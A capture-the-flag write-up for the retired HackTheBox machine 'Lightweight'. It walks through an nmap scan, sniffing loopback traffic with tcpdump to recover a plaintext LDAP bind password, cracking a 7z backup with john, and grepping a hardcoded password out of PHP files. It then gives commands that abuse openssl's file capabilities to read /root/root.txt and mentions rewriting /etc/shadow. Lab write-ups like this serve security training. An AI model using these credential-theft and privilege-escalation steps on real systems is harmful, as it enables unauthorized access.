HackTheBox Lightweight
Heyo nullers
Welcome to my writeup for the recently retired box Lightweight from HackTheBox.
Lightweight was tricky at the beginning. In general, it had:
- Packet sniffing
- LDAP Authentication
- Filesâ capabilites
Portscan:
Nmap showed three open ports, i.e. ssh, http and ldap
Nmap scan report for 10.10.10.119
Host is up (0.61s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after: 2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time
On port 80:
The user page prompt me to login via ssh with my IP as username and password.
So after doing that and taking a hint from @pry0cc and @guly I just âlistenedâ to the box for as long as I had to. I ran tcpdump -i lo -A -w inter.pcap
on the Lightweight box and then I just browsed the webpage. The status.php was taking quite a time to load, so that was suspicious.
After browsing the website enough, I moved the pcap file to /tmp and transfered it to my local computer with scp [email protected]:/tmp/inter.pcap .
Opening the file with wireshark, we find that there is an ldap âbind requestâ from ldapuser2 with simple authentication, meaning that the ldapuser2âs password was in plain sight.
By using it we su
to ldapuser2 we get the user flag.
su ldapuser2
Password:
[ldapuser2@lightweight ~]$ ls
backup.7z OpenLDAP-Admin-Guide.pdf OpenLdap.pdf user.txt
[ldapuser2@lightweight ~]$ cat user.txt
8a866d3b*******************
In ldapuser2âs home directory we find a backup.7z file. I transfered it to my local machine like the pcap file only to find out that it was password protected. There I used a script I found here which uses john to bruteforce the 7z file. The password was delete
There I found some php files, which are the same from the website, only with a twist:
after running cat * | grep user
in a desparate move for something valueable, I found that the user is ldapuser1,
vict0ni@vict0niLaptop:~/Desktop/CTF/HTB/Lightweight/backup$ cat * | grep username
$username = 'ldapuser1';
so the next logical thing to do is to run cat * | grep password
, where we find the ldapuser1âs password
vict0ni@vic0niLaptop:~/Desktop/CTF/HTB/Lightweight/backup$ cat * | grep password
$password = 'f3ca9d298a553da117442deeb6fa932d';
if ($bind=ldap_bind($ds, $dn, $password)) {
...
...
Escalating to ldapuser1, like previously with ldapuser2.
[ldapuser2@lightweight ~]$ su ldapuser1
Password:
[ldapuser1@lightweight ldapuser2]$ whoami
ldapuser1
There, root got a bit spoiled to me, because some people where giving away clues inside the box. Specific, one broadcasted the message âopenssl is the keyâ. Kind of a bummer but finding two binaries on the home directory was meaning that the way for root had to do with one of them. So the spoil just saved me a rabbithole. But, please, donât spoil things.
I enumerated the openssl binary I had in front of me. After examing itâs capabilities with getcap -r openssl
the output was openssl =ep
, which means that it had access to anything.
So to get the root.txt file, one must grab it with openssl, encrypt it and paste it in a directory, then decrypt it to read it, like /home/ldapuser1/openssl enc -base64 -in /root/root.txt -out enc_root
and then base64 -d enc_root
.
And there is the sweet root flag
[ldapuser1@lightweight ~]$ /home/ldapuser1/openssl enc -base64 -in /root/root.txt -out enc_root
[ldapuser1@lightweight ~]$ base64 -d enc_root
f1d4e309c*******************
PS: As @PresComm once said: âBut if you donât get a shell and canât run code, is a system really owned? â.
Searching for some way to get a root shell I came across this article, where one can rewrite the /etc/shadow file.